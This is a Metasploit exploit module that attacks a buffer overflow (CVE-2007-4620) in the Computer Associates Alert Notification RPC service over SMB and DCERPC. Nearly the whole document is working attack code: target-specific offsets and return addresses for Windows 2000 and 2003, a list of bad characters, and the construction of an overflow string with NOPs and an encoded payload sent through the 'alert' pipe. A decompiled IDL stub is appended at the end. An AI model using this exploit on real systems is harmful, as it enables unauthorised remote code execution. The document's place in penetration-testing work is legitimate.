1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::DCERPC
10
  include Msf::Exploit::Remote::SMB::Client
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Computer Associates Alert Notification Buffer Overflow',
17
        'Description' => %q{
18
          This module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1
19
          By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.
20
          In order to successfully exploit this vulnerability, you will need valid logon credentials to the target.
21
        },
22
        'Author' => [ 'MC' ],
23
        'License' => MSF_LICENSE,
24
        'References' => [
25
          [ 'CVE', '2007-4620' ],
26
          [ 'OSVDB', '44040' ],
27
          [ 'BID', '28605' ],
28
        ],
29
        'Privileged' => true,
30
        'DefaultOptions' => {
31
          'EXITFUNC' => 'thread',
32
        },
33
        'Payload' => {
34
          'Space' => 550,
35
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
36
          'StackAdjustment' => -3500,
37
        },
38
        'Platform' => 'win',
39
        'Targets' => [
40
          [ 'Windows 2003 SP0 English',	{ 'Offset' => 979, 'Ret' => 0x77e03efb } ],
41
          [ 'Windows 2000 SP4 English',	{ 'Offset' => 979, 'Ret' => 0x7c30d043 } ],
42
          [ 'CA BrightStor ARCServe Backup 11.5 / Windows 2000 SP4 English', { 'Offset' => 207, 'Ret' => 0x7c2e7993 } ], # Yin Dehui
43
        ],
44
        'DisclosureDate' => '2008-04-04',
45
        'DefaultTarget' => 0,
46
        'Notes' => {
47
          'Reliability' => UNKNOWN_RELIABILITY,
48
          'Stability' => UNKNOWN_STABILITY,
49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
        }
51
      )
52
    )
53

54
    register_options(
55
      [
56
        OptString.new('SMBPIPE', [ true, "The pipe name to use (alert)", 'alert']),
57
      ]
58
    )
59
  end
60

61
  def exploit
62
    connect()
63
    smb_login()
64

65
    handle = dcerpc_handle('3d742890-397c-11cf-9bf1-00805f88cb72', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
66
    print_status("Binding to #{handle} ...")
67

68
    dcerpc_bind(handle)
69
    print_status("Bound to #{handle} ...")
70

71
    filler = rand_text_english(target['Offset']) + [target.ret].pack('V') + make_nops(12)
72
    filler << payload.encoded + rand_text_english(772)
73

74
    sploit = NDR.string(rand_text_english(rand(1024) + 1) + "\x00") + NDR.string(filler + "\x00")
75
    sploit << NDR.string(rand_text_english(rand(1024) + 1) + "\x00") + NDR.long(0)
76

77
    print_status("Trying target #{target.name}...")
78

79
    begin
80
      dcerpc_call(0x00, sploit)
81
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
82
    end
83

84
    handler
85
    disconnect
86
  end
87
end
88

89
=begin
90
/*
91
 * IDL code generated by mIDA v1.0.8
92
 * Copyright (C) 2006, Tenable Network Security
93
 * http://cgi.tenablesecurity.com/tenable/mida.php
94
 *
95
 *
96
 * Decompilation information:
97
 * RPC stub type: inline
98
 */
99

100
[ uuid(3d742890-397c-11cf-9bf1-00805f88cb72), version(1.0) ]
101

102
interface mIDA_interface
103
{
104
typedef struct struct_1 {
105
  long elem_1;
106
  [size_is(10000), length_is(elem_1)] struct struct_2 * elem_2;
107
} struct_1 ;
108

109
typedef struct struct_2 {
110
  char elem_1[52];
111
} struct_2 ;
112

113

114
/* opcode: 0x00, address: 0x00401000 */
115

116
long   sub_401000 (
117
  [in][ref][string] char * arg_1,
118
  [out][ref] struct struct_1 * arg_2,
119
  [in][ref][string] char * arg_3
120
);
121

122
}
123
=end
124

125